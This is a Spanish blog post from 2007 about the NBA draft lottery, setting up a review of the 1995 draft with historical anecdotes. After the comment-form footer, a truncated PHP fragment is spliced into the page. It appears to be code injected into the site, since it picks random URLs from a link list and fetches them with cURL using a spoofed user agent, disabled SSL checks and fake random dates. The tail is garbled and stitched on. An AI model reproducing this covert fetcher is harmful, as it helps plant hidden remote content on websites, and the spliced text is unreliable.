Noches de draft: lo que pudo haber sido…

26 de December de 2007 por Jabho

“El Draft de la NBA corresponde al procedimiento por el cual, a finales del mes de junio de cada año, las franquicias que forman parte de esta liga de baloncesto estadounidense incorporan a sus equipos jugadores menores de veintitrés años, procedentes de las universidades norteamericanas o de las ligas de otros países.” (Wikipedia dixit). Así de simple. O complejo, según se mire.

Los jugadores jóvenes que quieren entrar en la liga se someten a un proceso de selección, con entrevistas, works outs, promesas,…como si de cualquier otra empresa se tratara, que culmina en la noche de elecciones en el draft. El proceso en si da ventaja a la hora de elegir a los peores equipos sobre los mejores, aunque la suerte tiene un papel fundamental.

 

A lo largo de la historia ha habido diversas formas de configurar el orden en que las franquicias elegían a los jugadores. Desde el más típico cara y cruz entre los dos últimos, pasando por el orden inverso puro hasta el sistema actual. El sistema actual fue implantado en el draft de 1985 y reparte 1000 participaciones de lotería entre los 14 equipos no clasificados para Play Offs., otorgando 250 participaciones al último clasificado y 1 sola participación al mejor equipo de los no clasificados. Las 3 primeras posiciones son por sorteo puro y duro, pero si el peor equipo no tiene una elección entre las tres primeras automáticamente se le asigna el pick 4. De igual manera el 2º peor equipo tiene asegurado un pick 5 en el peor de los casos y el tercer peor equipo tiene asegurado un pick 6.

Así que la suerte en la loteria y el buen ojo configuran “lo que pudo haber sido y no fue” para algunos equipos. O lo que si fue para los mas afortunados. A lo largo de la historia ha habido de todo, aciertos y sonados fracasos. Incluso elecciones que sonaban a fracaso y se convirtieron en un gran éxito. En esta serie me propongo hacer un ejercicio ventajista sobre el azar y el buen ojo. Ventajista porque ya se sabe, a huevos vistos macho seguro.

Como empezar desde el principio seria demasiado largo pondremos, arbitrariamente, el punto de partida en el draft de 1995.

Algunos de los jugadores elegibles en el draft 1995: Kurt Thomas, Michael Finley, Bob Sura, Theo Ratliff, Kevin Garnett, Rasheed Wallace, Damon Stoudamire, Dejan Bodiroga, Jerry Stackhouse, Brent Barry o Antonio McDyess

La clasificación de aquel año dejaba en los últimos lugares de la liga a:
27 – Clippers
26 – Minnesota
25 – Washington
24 – 76ers
23 – Warrirors

¿Qué deparó el sorteo a cada equipo?¿Que ojo tuvieron? Para el próximo día.

Historias del Draft:
Dos mujeres han sido elegidas en el draft de la NBA. En 1969 los San Francisco Warriors eligieron en octava ronda a Denise Long. La NBA declaró enseguida la elección como nula. Ocho años después fueron los New Orleans Jazz los que seleccionaron a Lusia Harris en el puesto 137 de la séptima ronda.

Red Auerbach tenía fama de buen ojo en el draft. Aunque no siempre. En 1950 Boston elegía en primer lugar y Red Auerbach se decantó por el pivot Chuck Share, descartando a un base de la zona muy prometedor. Ante la critica generalizada, Red declaró: “Necesitamos un hombre alto, pequeños hay a muchos. Estoy aquí para ganar, no para elegir a palurdos locales”. El base en cuestión recaló en los Blackhawks, quienes desaparecieron antes de empezar la liga. El resto de equipos se repartieron sus jugadores escogiendo los nombres escritos en papeles que se depositaron en un sombrero. A los Celtics les tocó quedarse con el susodicho base, un tipo que revolucionaria el juego y ganaría seis anillos. El base en cuestión era nada menos que Bob Cousy.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>